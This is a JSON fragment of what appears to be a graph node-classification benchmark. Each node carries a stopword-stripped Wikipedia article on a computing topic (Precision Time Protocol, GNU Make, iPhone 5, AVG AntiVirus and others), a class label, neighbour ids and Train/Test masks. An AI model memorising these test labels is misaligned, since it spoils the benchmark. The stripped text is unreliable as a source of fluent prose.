    "text": "Precision_Time_Protocol:precision time protocol precision time protocol ptp protocol used synchronize clocks throughout computer network local area network achieves clock accuracy sub-microsecond range making suitable measurement control systems ptp currently employed synchronize financial transactions mobile phone tower transmissions sub-sea acoustic arrays networks require precise timing lack access satellite navigation signals ptp originally defined ieee 1588-2002 standard officially entitled standard precision clock synchronization protocol networked measurement control systems published 2002 2008 ieee 1588-2008 released revised standard also known ptp version 2 improves accuracy precision robustness backward compatible original 2002 version according john eidson led ieee 1588-2002 standardization effort ieee 1588 designed fill niche well served either two dominant protocols ntp gps ieee 1588 designed local systems requiring accuracies beyond attainable using ntp also designed applications bear cost gps receiver node gps signals inaccessible ieee 1588 standards describe hierarchical master-slave architecture clock distribution architecture time distribution system consists one communication media network segments one clocks ordinary clock device single network connection either source master destination slave synchronization reference boundary clock multiple network connections accurately synchronize one network segment another synchronization master selected network segments system root timing reference called grandmaster grandmaster transmits synchronization information clocks residing network segment boundary clocks presence segment relay accurate time segments also connected simplified ptp system frequently consists ordinary clocks connected single network boundary clocks used grandmaster elected clocks synchronize directly ieee 1588-2008 introduces clock associated network equipment used convey ptp messages transparent clock modifies ptp messages pass device timestamps messages corrected time spent traversing network equipment scheme improves distribution accuracy compensating delivery variability across network ptp typically uses epoch unix time start 1 january 1970 unix time based coordinated universal time utc subject leap seconds ptp based international atomic time tai ptp grandmaster communicates current offset utc tai utc computed received ptp time synchronization management ptp system achieved exchange messages across communications medium end ptp uses following message types messages categorized event general messages event messages time-critical accuracy transmission receipt timestamp accuracy directly affects clock distribution accuracy sync delay_req pdelay_req pdelay_resp event messages general messages conventional protocol data units data messages importance ptp transmission receipt timestamps announce follow_up delay_resp pdelay_resp_follow_up management signaling messages members general message class ptp messages may use user datagram protocol internet protocol udp/ip transport ieee 1588-2002 uses ipv4 transports extended include ipv6 ieee 1588-2008 ieee 1588-2002 ptp messages sent using multicast messaging ieee 1588-2008 introduced option devices negotiate unicast transmission port-by-port basis multicast transmissions use ip multicast addressing multicast group addresses defined ipv4 ipv6 see table time-critical event messages sync delay_req pdelay_req pdelay_resp sent port number 319 general messages announce follow_up delay_resp pdelay_resp_follow_up management signaling use port number 320 ieee 1588-2008 encapsulation also defined devicenet controlnet profinet domain interacting set clocks synchronize one another using ptp clocks assigned domain virtue contents subdomain name ieee 1588-2002 domainnumber ieee 1588-2008 fields ptp messages receive generate domains allow multiple clock distribution systems share communications medium best master clock bmc algorithm performs distributed selection best candidate clock based following clock properties ieee 1588-2008 uses hierarchical selection algorithm based following properties indicated order ieee 1588-2002 uses selection algorithm based similar properties clock properties advertised ieee 1588-2002 sync messages ieee 1588-2008 announce messages current clock master transmits information regular interval clock considers better master clock transmit information order invoke change master clock current master recognises better clock current master stops transmitting sync messages associated clock properties announce messages case ieee 1588-2008 better clock takes master bmc algorithm considers self-declared quality clocks take network link quality consideration use bmc algorithm ptp selects master source time ieee 1588 domain network segment domain clocks determine offset master let variable formula_1 represent physical time given slave device offset formula_2 time formula_1 defined formula_5 represents time measured slave clock physical time formula_1 formula_7 represents time measured master clock physical time formula_1 master periodically broadcasts current time message clocks ieee 1588-2002 broadcasts per second ieee 1588-2008 10 per second permitted broadcast begins time formula_9 sync message sent master clocks domain clock receiving message takes note local time formula_10 message received master may subsequently send multicast follow_up accurate formula_9 timestamp masters ability present accurate timestamp sync message transmission complete able retrieve accurate timestamp sync transmission network hardware masters limitation use follow_up message convey formula_9 masters ptp capabilities built network hardware able present accurate timestamp sync message need send follow_up messages order accurately synchronize master clocks must individually determine network transit time sync messages transit time determined indirectly measuring round-trip time clock master clocks initiate exchange master designed measure transit time formula_13 exchange begins clock sending delay_req message time formula_14 master master receives timestamps delay_req time formula_15 responds delay_resp message master includes timestamp formula_15 delay_resp message exchanges clock learns formula_9 formula_10 formula_14 formula_15 formula_13 transit time sync message formula_22 constant offset master slave clocks combining two equations find clock knows offset formula_22 transaction correct amount bring agreement master one assumption exchange messages happens period time small offset safely considered constant period another assumption transit time message going master slave equal transit time message going slave master finally assumed master slave accurately measure time send receive message degree assumptions hold true determines accuracy clock slave device ieee 1588-2008 standard lists following set features implementations may choose support",
    "neighbors": [
      1411,
      8708,
      7045,
      7049,
      11413,
      5270,
      5671,
      6187,
      3762,
      434,
      11321,
      5439,
      8386,
      3780,
      8260,
      6993,
      10332,
      5469,
      5470,
      5472,
      4581,
      5863,
      10344,
      3441,
      6769,
      7411,
      11250,
      11125,
      6904,
      6265,
      8828,
      3838
    ],
    "mask": "Train"
  },
  {
    "node_id": 4397,
    "label": 8,
    "text": "WS-Reliability:ws-reliability ws-reliability soap-based soap 1.1 soap 1.2 part 1 oasis specification fulfills reliable messaging requirements critical applications web services ws-reliability superseded ws-reliablemessaging soap http sufficient application-level messaging protocol must also guarantee level reliability security specification defines reliability context current web services standards specification designed use combination complementary protocols builds previous experiences e.g. ebxml message service",
    "neighbors": [
      10020,
      7878,
      6353,
      4979,
      10486
    ],
    "mask": "None"
  },
  {
    "node_id": 4398,
    "label": 9,
    "text": "Make_(software):make software software development make build automation tool automatically builds executable programs libraries source code reading files called makefiles specify derive target program though integrated development environments language-specific compiler features also used manage build process make remains widely used especially unix unix-like operating systems besides building programs make used manage project files must updated automatically others whenever others change number dependency-tracking build utilities make one widespread primarily due inclusion unix starting pwb/unix 1.0 featured variety tools targeting software development tasks originally created stuart feldman april 1976 bell labs feldman received 2003 acm software system award authoring widespread tool feldman inspired write make experience coworker futilely debugging program executable accidentally updated changes make introduction unix build system commonly consisted operating system dependent make install shell scripts accompanying program source able combine commands different targets single file able abstract dependency tracking archive handling important step direction modern build environments make gone number rewrites including number from-scratch variants used file format basic algorithmic principles also provided number non-standard enhancements posix includes standardization basic features operation make utility implemented varying degrees completeness unix-based versions make general simple makefiles may used various versions make reasonable success gnu make makepp versions bsd make default looking first files named gnumakefile makeppfile bsdmakefile respectively allows one put makefiles use implementation-defined behavior separate locations make typically used build executable programs libraries source code generally though make applicable process involves executing arbitrary commands transform source file target result example make could used detect change made image file source transformation actions might convert file specific format copy result content management system send e-mail predefined set users indicating actions performed make invoked list target file names build command-line arguments make target ... without arguments make builds first target appears makefile traditionally symbolic phony target named make decides whether target needs regenerated comparing file modification times solves problem avoiding building files already date fails file changes modification time stays past changes could caused restoring older version source file network filesystem source files clock timezone synchronized machine running make user must handle situation forcing complete build conversely source file modification time future triggers unnecessary rebuilding may inconvenience users make searches current directory makefile use e.g gnu make searches files order file named one gnumakefile makefile makefile runs specified default target file makefile language similar declarative programming class language necessary end conditions described order actions taken important sometimes confusing programmers used imperative programming one problem build automation tailoring build process given platform instance compiler used one platform might accept options one used another well handled make problem typically handled generating platform-specific build instructions turn processed make common tools process autoconf cmake gyp advanced ng makefile consists rules rule begins textual dependency line defines target followed colon optionally enumeration components files targets target depends dependency line arranged target left hand colon depends components right hand colon common refer components prerequisites target usually rule single unique target rather multiple targets example c .o object file created .c files .c files come first i.e specific object file target depends c source file header files make understand recognize distinguish different kinds files opens possibility human error forgotten extra dependency may immediately obvious may result subtle bugs generated software possible write makefiles generate dependencies calling third-party tools makefile generators automake toolchain provided gnu project automatically dependency line may followed series tab indented command lines define transform components usually source files target usually output prerequisites recent modification time target command lines run gnu make documentation refers commands associated rule recipe first command may appear line prerequisites separated semicolon targets prerequisites command example hello echo hello make decide start topological sorting command line must begin tab character recognized command tab whitespace character space character special meaning problematic since may visual difference tab series space characters aspect syntax makefiles often subject criticism described eric s. raymond one worst design botches history unix unix-haters handbook said using tabs part syntax like one pungee stick traps green berets feldman explains choice caused workaround early implementation difficulty preserved desire backward compatibility first users however gnu make since version 3.82 allows choose symbol one character recipe prefix using .recipeprefix special variable example .recipeprefix command executed separate shell command-line interpreter instance since operating systems use different command-line interpreters lead unportable makefiles instance gnu make default executes commands /bin/sh unix commands like cp normally used contrast microsoft nmake executes commands cmd.exe batch commands like copy available necessarily cp rule may command lines defined dependency line consist solely components refer targets example realclean clean distclean command lines rule usually arranged generate target example file.html newer converted text contents makefile file.txt file.html rule would triggered make updates file.txt following invocation make would typically use rule update file.txt target file.html newer make file.txt command lines one following three prefixes ignoring errors silencing echo alternatively obtained via special targets .ignore .silent microsoft nmake predefined rules omitted makefiles e.g c.obj cc cflags makefile contain definitions macros macros usually referred variables hold simple string definitions like cc=clang macros makefiles may overridden command-line arguments passed make utility environment variables also available macros macros allow users specify programs invoked custom behavior build process example macro cc frequently used makefiles refer location c compiler user may wish specify particular compiler use new macros simple variables traditionally defined using capital letters macro definition macro used expanding traditionally done enclosing name inside codice_1 omitting parentheses leads make interpreting next letter entire variable name equivalent form uses curly braces rather parentheses i.e codice_2 style used bsds new_macro macro macro2 macros composed shell commands using command substitution operator denoted backticks codice_3 yyyymmdd date content definition stored lazy evaluation used meaning macros normally expanded expansions actually required used command lines rule extended example package package version date y. archive package version dist generic syntax overriding macros command line make macro= value macro= value ... target target ... makefiles access number predefined internal macros common target component1 component2 suffix rules targets names form codice_4 used launch actions based file extension command lines suffix rules posix specifies internal macro codice_5 refers first prerequisite codice_6 refers target example converts html file text shell redirection token codice_7 part command line whereas codice_5 macro referring html file .suffixes .txt .html .html.txt called command line example expands make -n file.txt lynx -dump file.html file.txt suffix rules prerequisites treated normal files unusual names suffix rules gnu make supports suffix rules compatibility old makefiles otherwise encourages usage pattern rules pattern rule looks like ordinary rule except target contains exactly one character target considered pattern matching file names match substring zero characters characters match prerequisites likewise use show names relate target name example suffix rule would look like following pattern rule .txt .html single-line comments started hash symbol directives makefiles include makefiles line continuation indicated backslash codice_9 character end line makefiles traditionally used compiling code *.c *.cc *.c etc also used providing commands automate common tasks one makefile called command line make without argument runs first target make help show available targets make dist make release archive current dir makefile package package version date y. release_dir .. release_file package version help list dist simple makefile default rule listed first compiles source file called helloworld.c using system c compiler also provides clean target remove generated files user desires start codice_6 codice_5 two so-called internal macros also known automatic variables stand target name implicit source respectively example codice_12 expands space delimited list prerequisites number internal macros cflags -g helloworld helloworld helloworld.o helloworld.o helloworld.c clean frc frc many systems come predefined make rules macros specify common tasks compilation based file suffix lets users omit actual often unportable instructions generate target source system makefile could modified follows helloworld helloworld helloworld.o clean frc .c.o frc .suffixes .c helloworld.o depends helloworld.c automatically handled make simple example one illustrated hardly matters real power suffix rules becomes evident number source files software project starts grow one write rule linking step declare object files prerequisites make implicitly determine make object files look changes source files simple suffix rules work well long source files depend files header files another route simplify build process use so-called pattern matching rules combined compiler-assisted dependency generation final example requiring gcc compiler gnu make generic makefile compiles c files folder corresponding object files links final executable compilation takes place dependencies gathered makefile-friendly format hidden file .depend included makefile portable programs ought avoid constructs used ifneq makefile requires gnu make endif program foo c_files wildcard *.c objs patsubst .c .o c_files cc cc cflags -wall -pedantic ldflags ldlibs -lm program program .depend objs depend .depend .depend cmd gcc -mm -mf depend var cat depend » .depend .depend -include .depend .o .c .c clean .phony clean depend",
    "neighbors": [
      515,
      9733,
      9735,
      6664,
      521,
      3083,
      5651,
      7196,
      10276,
      2599,
      8236,
      8262,
      5706,
      3659,
      5711,
      9298,
      2132,
      7764,
      6743,
      2658,
      8303,
      8306,
      5759,
      5249,
      9345,
      5253,
      5256,
      6281,
      4750,
      10387,
      2198,
      6812,
      671,
      7847,
      6313,
      11442,
      4279,
      7356,
      2245,
      4294,
      1741,
      213,
      1750,
      10967,
      9946,
      6369,
      9444,
      11492,
      2281,
      8941,
      4850,
      10484,
      2809,
      8954,
      3837,
      1277,
      5896,
      4369,
      5397,
      5923,
      1837,
      7983,
      9520,
      9014,
      823,
      1336,
      4919,
      3386,
      8504,
      8517,
      9542,
      8522,
      11610,
      349,
      7518,
      8031,
      11625,
      5492,
      2432,
      8582,
      3976,
      6536,
      11663,
      3988,
      4001,
      2477,
      1459,
      451,
      963,
      965,
      1987,
      9671,
      1501,
      8675,
      10727,
      6120,
      491,
      10732,
      11249,
      5106,
      506,
      8692,
      9204,
      9714,
      6138,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4399,
    "label": 2,
    "text": "IPhone_5:iphone 5 iphone 5 smartphone designed marketed apple inc sixth generation iphone succeeding iphone 4s preceding iphone 5s iphone 5c formally unveiled part press event september 12 2012 released september 21 2012 iphone 5 first iphone announced september setting trend subsequent iphone releases first iphone completely developed guidance tim cook last iphone overseen steve jobs iphone 5 featured major design changes comparison predecessor included aluminum-based body thinner lighter previous models taller screen nearly aspect ratio apple a6 system-on-chip lte support lightning new compact dock connector replaced 30-pin design used previous iphone models second apple phone include new sony-made 8 mp camera first introduced iphone 4s apple began taking pre-orders september 14 2012 two million received within 24 hours initial demand iphone 5 exceeded supply available launch september 21 2012 described apple extraordinary pre-orders sold twenty times faster predecessors reception iphone 5 generally positive consumers reviewers noted hardware issues unintended purple hue photos taken phone coating prone chipping reception also mixed apple decision switch different dock connector design change affected iphone 5 compatibility accessories otherwise compatible previous iterations line iphone 5 officially discontinued apple september 10 2013 announcement successors iphone 5s iphone 5c iphone 5 second-shortest lifespan iphone ever produced twelve months production breaking apple standard practice selling existing iphone model reduced price upon release new model broken iphone x ten-months production november 2017 september 2018 replaced midrange entry-level device iphone 5c 5c internal hardware specifications almost identical 5 albeit less expensive polycarbonate exterior iphone 5 supports ios 6 7 8 9 10 iphone 5 second iphone support five major versions ios iphone 4s rumors began shortly announcement iphone 4s though detailed leaks emerge june 2012 july 30 2012 reports pinpointed dates iphone 5 would unveiled released along accurate predictions features september 4 2012 apple announced would hosting event yerba buena center arts san francisco september 12 2012 shadow numeral 5 featured invitations sent media suggesting next iphone would unveiled event unveiling apple announced iphone 5 also introduced new ipod nano ipod touch models also stated pre-orders would accepted starting september 14 2012 two million pre-orders received within 24 hours initial demand new phone exceeded record set predecessor iphone 4s selling 5 million units first three days november 30 2012 apple added unlocked version iphone 5 online us store 16 gb model starting us 649 iphone 5 officially discontinued apple september 10 2013 announcement successors iphone 5s iphone 5c 5c shared almost internal hardware iphone 5 5c used lower-cost poly-carbonate plastic case place original 5 aluminum form introduction 5c deviated apple previous market strategy previous iphone model would remain production sold lower price point new model april 28 2014 apple initiated warranty recall program replace failing power buttons iphone 5 models manufactured prior march 2013 cost august 23 2014 apple announced program replace batteries iphone 5 models may suddenly experience shorter battery life need charged frequently sold september 2012 january 2013 following release iphone 5 samsung announced filing lawsuit apple infringing eight patents case scheduled begin 2014 statement samsung said little choice take steps necessary protect innovations intellectual property rights litigation two involving patent infringement ongoing fought several court cases around world components labor required construct basic iphone 5 estimated cost us 207 us 19 cost components corresponding iphone 4s model lte module iphone 5 alone costs 34 10 cellular module iphone 4s similarly screens used iphone 5 cost 44 7 screen predecessor mashable noted profit margin selling device huge iphone 5 retails us 649 announcement device lack supply evident due shortage components screen reports emerged stating sharp unable ship screen debut iphone 5 manufacturers reported difficult keep demand result number pre-orders rose due uncertainty stock retail stores delivery dates pre-orders postponed dates initial release date device china labor watch new york state–based ngo reported three four thousand foxconn workers work iphone 5 production plant zhengzhou stopped working october 5 2012 strikes occurred apple implemented stricter quality standard products includes 0.02 mm restriction indentations inflicted production imposed demands related scratches frames back covers strikes also attributed employer forcing employees work public holiday report stated training inadequate quality demands expected led employees producing products meet standards strike conflicts quality control inspectors employees resulted brawls china labor watch also claimed concerns raised inspectors addressed factory management foxconn spokesmen admitted micromanagement problem exists also said 300 400 workers absent conflicts influence production processes november 2012 foxconn chairman terry gou reported delay production due undisclosed difficulties assembly features ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating vertically one common result switching portrait landscape mode iphone 5 shipped ios 6 released september 19 2012 many features work specifically included ios 6.0 operating system worked certain territories release apple said rolling program take longer implement across regions phone act hotspot sharing internet connection wifi bluetooth usb also accesses app store online application distribution platform ios developed maintained apple service allows users browse download applications itunes store developed xcode ios sdk published apple play music movies television shows ebooks audiobooks podcasts sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations options always presented alphabetically except playlists retain order itunes users rotate device horizontally landscape mode access cover flow like itunes feature shows different album covers scroll-through photo library scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks iphone 5 volume changed included apple earphones voice control feature used identify track play songs playlist specific artist create genius playlist like iphone 4s iphone 5 siri allows user operate iphone spoken commands software improved ios 6 include ability make restaurant reservations launch apps dictate facebook twitter updates retrieve movie reviews detailed sports statistics texting aided voice assistant converts speech text addition regular texting messaging supports imessage specialized instant messaging program service allows unlimited texting apple devices running ios 5 later supports inclusion content images sound text messages integration device voice-controlled software assistant read acknowledgements sent messages input device comes keyboard displayed multi-touch screen voice-to text speaking microphone entered text supported predictive suggestion software multi-language spell-checker recognises many regional accents different languages ios 6 features several new and/or updated apps includes apple maps passbook apple built-in maps app replaced former maps app powered google maps universally derided lacked many features present competing maps apps uses apple new vector-based engine eliminates lag making smoother zooming new maps turn-by-turn navigation spoken directions 3d views major cities real-time traffic ios 6 able retrieve documents boarding passes admission tickets coupons loyalty cards new passbook app ios device passbook scanned reader process mobile payment locations compatible hardware app context-aware features notifications relevant coupons immediate vicinity given store facebook comes integrated apple native apps ios 6 facebook features directly accessed within native apps calendar sync facebook events use facebook like button within apple app store new privacy settings available user addition location services following added ios 6 photos already partially restricted ios 5 contacts address book calendars reminders bluetooth sharing twitter facebook sina weibo ios 6 also comes limit ad tracking user control general settings menu allow users option prevent targeted advertising apple advertising identifier replaces company existing unique device identification udid standard advertising networks yet using apple advertising identifier device identifier standard would affected although apple require standard future apple emphasized improved build quality iphone 5 press event frame used previous versions redesigned use aluminum composite frame used stainless steel instead aluminium due steve jobs preference metal thought looks beautiful wears 18 thinner 20 lighter 12 less overall volume predecessor iphone 4s phone aluminum body thick september 2012 conference apple claimed thinnest smartphone world 7.6 mm though claim disputed chinese oppo finder thinner smartphones could considered thinner depending upon thickness measured oppo finder measured thinnest point thickest point making overall thinner iphone uses system chip soc called apple a6 soc comprises 1.3 ghz dual-core processor 1gb ram tri-core powervr sgx543mp4 running 266 mhz. ref name= geekbench test 28/9 /ref operating memory lpddr2-1066 edram doubled 512 mb 1 gb storage capacities available fixed 16 32 64 gb 4s plug-in memory cards supported two color options black black glass slate-colored metal trim white white ceramic silver-colored metal trim color options though differently implemented predecessor 4s iphone 5 retains 8 megapixel back camera iphone 4s improved low-light performance 40 faster photo capture predecessors purple hue strong source light present photograph front camera accessible facetime camera app lower resolution 1.2 megapixels rechargeable lithium-ion battery charge capacity 1440mah built replaced user rated ≤225 hours standby time ≤8 hours talk time three separate models phone available one supporting cdma two gsm versions knock-on effects version device actually work countries/regions phone takes nano-sim smaller micro-sim hardware benchmarking conducted using geekbench glbenchmark validates several claims apple included website mentioned unveiling device include two times faster two times graphics performance geekbench overall hardware assessment iphone 5 received score approximately 2.5 times higher iphone 4s benchmark conducted using glbenchmark iphone 5 returned score 2 times better iphone 4s result however inconsistent 3d graphics benchmark assessment using passmark returned score approximately 1.45 times better iphone 4s battery life assessments conducted anandtech concluded battery life shorter iphone 5 predecessor performing certain tasks however performing tasks iphone 5 battery outlasts iphone 4s retina display 1,136 × 640 pixels aspect ratio almost exactly 16:9 minus one extra row horizontal pixels diagonal 4 display size 6.7 square inches compared 5.7 iphone 4 4s pixel density remains 4s model 326 pixels per inch screen icons iphone 5 arranged matrix six rows four icons increased screen size allows sixth row icons added five rows present iphone 4 in-cell touch sensor technology sharp slims screen allows thinner phone screen color saturation 44 greater predecessor three microphones placed front side back noise cancellation video calls april 28 2014 apple initiated warranty recall program replace failing power buttons iphone 5 models manufactured prior march 2013 cost august 23 2014 apple announced program replace batteries iphone 5 models may suddenly experience shorter battery life need charged frequently sold september 2012 january 2013 well ipod touch 5th generation ipod nano 7th generation ipad 4th generation ipad mini feature new dock connector named lightning replaces 30-pin apple dock connector introduced 2003 apple ipod 3rd generation apple lightning connector eight pins signaling digital new connector smaller previous one helping slimmer predecessors apple lightning cables duplicate pins two sides plug inserted either way round various accessories available convert apple lightning connector older 30-pin apple dock connector usb although old accessories work signals available particular video output ipod feature bmw automobiles earphones known apple earpods included iphone 5 devices announced apple media event september 12 2012 superseded earphones included previous generation iphones ipods according technology commentators redesign earphones aimed improve sound quality allowing air travel freely apple states redesign earphones allows rival high-end headphones cost hundreds dollars reviews gizmodo techradar reported although redesigned earphones sounded better predecessor reviewers felt quality sound produced poor verizon sprint offer lte access us uk ee three able offer lte access march 26 2013 t-mobile announced would begin carrying iphone 5 making first iphone available four nationwide carriers united states t-mobile version iphone features modified version a1428 iphone 5 model enabling advanced wireless services aws support carriers canada selling lte networks including rogers wireless fido solutions bell mobility virgin mobile canada telus mobility koodo mobile 42 officially recognized bands exist lte however rollouts coalescing around more-popular bands based historically made available specific regions europe bands available lte include 2.6 ghz 3g-expansion band 800 mhz cleared analogue tv 1,800 mhz appearing places including uk germany carrier network supported t-mobile 1,800 mhz band allocated lte countries europe including denmark norway sweden others—will able offer lte connectivity via iphone 5 customers current lte networks already deployed lte 2.6 ghz band iphone 5 support november 2012 representative swisscom reported iphone 5 supports lte networks tested certified apple unlike iphone 4s world phone produced apple three versions iphone 5 differ frequency used three work 2g gsm/gprs 3g umts/edge networks 800 1900 mhz bands used americas 900 1800 mhz bands used elsewhere cdma a1429 model works cdma networks sprint verizon another version supports lte 1700/2100 mhz aws band 700 mhz band recovered conversion digital television us channels 52 56 currently network supports band gsm a1429 supports several lte bands available countries lte bands 1 3 5 received mainly positive reviews commentators reviewers tim stevens engadget praised high resolution screen surpassing considered one best phone screens available market stevens critical new connector incompatible devices cables use superseded 30-pin connector although la times reported change necessary make device smaller predecessor engadget agreed apple fulfilled promises stated website better battery performance two times graphics performance two times faster david pogue new york times considered 4-inch retina display nice life-changing change praised lightning connector size sturdiness reversibility noting lack support older accessories remarking apple long history killing technologies inconveniently expensively public come love technology columnist ed baig usa today impressed apple met public lofty expectations iphone 5 competitive market repair-ability review ifixit found iphone 5 easier disassemble repair predecessor wired reported iphone 5 design carried iphone 5s iphone se regarded long golden child apple phone design benchmark phones general succeeding iphone 6/6s design less critically acclaimed felt little bit wrong though holding slick 650 bar soap wired described iphone 5 elegance rooted way aluminum glass work together felt streamlined yet substantial different iphone 6 feels substantial size alone plus unlike ubiquitous rounded corners 6 iphone 5 ’ really look like anything else market time however iphone 5 design suited scaling contrast iphone 6/6s could better accommodate growing consumer trend towards larger screen sizes indeed spawned 6/6s plus phablet models reviewers commentators critical new maps app replaced google maps ios 6 reported contain errors misplacement landmark tags directing users incorrect locations poor satellite images nine days maps release apple issued statement apologizing frustration caused customers recommending try alternate mapping services gizmodo editor diaz discussed correspondence apple reader purple flare pictures taken iphone 5 camera apple response issue normal advised customer aim camera away bright light sources taking photos tests conducted techcrunch indicate problem existed iphone 4s distinct pronounced iphone 5 consumer reports found purple haze effect occurred several manufacturers phones including samsung galaxy iii motorola droid razr maxx less pronounced iphone 4s report concluded digital cameras general including higher-end slrs suffer lens flare purple-tinted effect uncommon anecdotal claims iphone 5 coating chipping exposing bright aluminium underneath apple executive response email correspondence affected customer summarized normal aluminum scratch term scuffgate reference antennagate affected iphone 4 applied various sources cnet yahoo news things digital describe scuffing issue users reported internet white model leaked light behind screen though issue unique iphone 5 also affected apple devices techcrunch reported sold twenty times faster 4 4s models apple said blown away customer response phil schiller apple vice-president worldwide marketing said two million orders received first 24 hours said fastest-selling iphone company ever offered selling five million units launch weekend exceeding supply available release sale iphone 5 also slowed growth android according market share reports released kantar worldpanel comtech first 16 days phone initial release comprised 20 phones sold period j.p. morgan chief economist michael feroli said sales could boost annualized us gdp growth 3.2 billion 12.8 billion annual rate shortly announcement iphone 5 preceding launch apple stock price rose record 705.07 within three months fell 507.48 according analysis eric savitz apple stock decline resulting losses result issue new maps application disappointed investors points initial hardware sales five million compared projections twice primary cause since release iphone 5 discounts previous generation iphones enabled apple maintain market lead united states japan iphone continued lag behind combined total android phones global market",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      7857,
      8890,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2383,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 4400,
    "label": 3,
    "text": "Annapurna_Labs:annapurna labs annapurna labs israel-based microelectronics company acquired amazon.com amazon web services division reputedly us 350–370m january 2015 annapurna labs owned avigdor willenz investors including british-based holding companies venture capital firm walden international board members include lip-bu tan ceo walden international cadence design systems features features al73400 announced november 2018 amazon aws invent 2018 features",
    "neighbors": [
      7248,
      7833,
      3835,
      9964
    ],
    "mask": "Test"
  },
  {
    "node_id": 4401,
    "label": 4,
    "text": "Macrium_Reflect:macrium reflect macrium reflect backup utility microsoft windows developed paramount software uk ltd 2006 creates disk images file backup archives using microsoft volume shadow copy service ensure 'point time data accuracy macrium reflect backup whole partitions individual files folders single compressed mountable archive file used restore exact images partitions hard disk disaster recovery new hard disk data migration received numerous favorable reviews often recommended used example program cloning backup tutorials macrium reflect create full incremental differential backup images selectively back individual files folders data compressed encrypted real time using lz-based compression aes encryption algorithms images mounted drive letter windows explorer restored using custom macrium reflect rescue cd event partial complete system loss image used restore entire disk one partitions individual files folders macrium reflect clone one disk onto another restore image new hardware using pre-created macrium reflect rescue cd critical drivers required new system inserted image taken old system making compatible new hardware central management console available enables scheduling restore monitoring multiple networked computers running macrium reflect using web browser user interface unsupported free edition available home commercial use lacks features full versions incremental backup though includes differential backup still features found expensive commercial products",
    "neighbors": [
      9025,
      4074,
      6797,
      1358,
      7983,
      11568,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4402,
    "label": 2,
    "text": "Ettore_Perazzoli:ettore perazzoli ettore perazzoli june 15 1974 december 10 2003 italian free software developer born milan italy studied engineering politecnico di milano university wrote port x64 commodore 64 emulator unix dos thus turning cross-platform emulator renamed vice maintainer vice many years started microsoft windows port popular version vice started contributing gnome linux desktop environment helped writing gtkhtml nautilus evolution close friend nat friedman miguel de icaza invited work company founded ximian accepted 2001 moved boston united states ximian headquartered ximian led effort create evolution remained project manager died started writing application managing digital photo albums c personal use november 8 2003 published gnome concurrent versions system cvs server name f-spot december 12 2003 gnomedesktop.org website announced death",
    "neighbors": [
      1668,
      5612,
      6797,
      5492,
      823,
      7450,
      8157
    ],
    "mask": "Test"
  },
  {
    "node_id": 4403,
    "label": 4,
    "text": "AVG_AntiVirus:avg antivirus avg antivirus previously known avg abbreviation anti-virus guard family antivirus software developed avg technologies subsidiary avast available windows macos android brand avg comes grisoft first product anti-virus guard launched 1992 czech republic 1997 first avg licenses sold germany uk avg introduced u.s. 1998 avg free edition helped raise awareness avg product line 2006 avg security package grew include anti-spyware avg technologies acquired ewido networks anti-spyware group avg technologies acquired exploit prevention labs xpl december 2007 incorporated company linkscanner safe search surf technology avg 8.0 security product range released march 2008 january 2009 avg technologies acquired sana security developer identity theft prevention software software incorporated avg security product range march 2009 according avg technologies company 200 million active users worldwide including 100 million use products services mobile devices 7 july 2016 avast announced agreement acquire avg 1.3 billion avg provides avg antivirus free windows avg antivirus mac macos avg antivirus android android devices freemium products free download install update use technical support premium plan must purchased avg stopped providing new features windows xp windows vista january 2019 new versions require windows 7 later virus definitions still provided previous versions avg features common functions available modern antivirus internet security programs including periodic scans scans sent received emails including adding footers emails indicating ability repair virus-infected files quarantine area virus vault infected files held patent pending linkscanner technology acquired exploit prevention labs built avg products provides real-time updated protection exploits drive-by downloads linkscanner includes search-shield – safe search component places safety ratings next link google yahoo msn search results plus active surf-shield – safe surf component scans contents web site real-time ensure safe opened concerns regarding web analytics made linkscanner controversial component see linkscanner concerns avg 8.0 first released linkscanner safe search feature shown cause increase traffic web sites appear high search engine results pages since linkscanner disguises scans coming internet explorer 6 browser prescans site listed search results web site usage logs showed incorrect overinflated site visitor statistics prescanning every link search results also caused web sites transfer data usual resulting higher bandwidth usage web site operators slow performance users avg initially said site administrators would able filter linkscanner traffic site statistics leaving problem excess bandwidth usage still solved pay-per-click advertising affected increase traffic avg online shield feature designed check files ensure safe avg online shield also ensures safety exchanging files via instant messengers voip clients response complaints avg announced 9 july 2008 search-shield longer scan search result online new exploits causing spikes webmasters addressed us releasing new build date applies local blacklist prefetches scans links clicked user 2014 numerous reports dating back 2012 avg safeguard toolbar installs without consent user side effect installing applications toolbar program appears cause significant ram issues considered intrusive potentially unwanted program pup installed avg toolbar virtually impossible remove toolbar uninstaller function instead re-installing add-on manually removed consequently many discussions blog posts described complex procedures removal avg toolbar mixed results september 2015 avg announced would start tracking users profit analyzing data sale advertising industry measure received criticism consumers press security industry many users intended use software order protect spyware would expect functions spyware hidden security software december 2015 avg web tuneup google chrome extension automatically installed avg 